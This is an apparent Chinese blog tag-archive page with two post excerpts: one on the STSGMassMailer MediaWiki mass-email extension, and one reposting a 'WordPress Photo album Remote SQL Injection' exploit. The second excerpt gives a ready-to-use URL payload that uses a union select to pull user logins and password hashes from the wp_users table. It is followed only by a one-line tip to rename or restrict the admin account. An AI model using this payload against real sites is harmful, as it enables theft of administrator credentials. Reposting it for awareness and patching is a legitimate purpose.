Tag Archives: 权限
STSGMassMailer助Mediawiki邮件群发
STSGMassMailer是mediawiki的一个扩展插件,很感谢“漢武帝”让我认识啦他。 这个扩展功能的详细文档:http://www.mediawiki.org/wiki/Extension:STSGMassMailer STGS MassMailer adds a special page called Mass E-mail which allows to send a mass emailing to all wiki users with valid email addresses. It also allows you to pick and choose which persons to send to, and … Continue reading
WordPress Photo album Remote SQL Injection Vulnerability
EXAMPLEhttp://xxxxxxxx/?page_id=13&album= [exploit]EXPLOİTS@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字
Posted in wordpress支持, 漏洞
Tagged admin, Photo, Remote SQL Injection, WordPress, 权限, 注入, 漏洞
1 Comment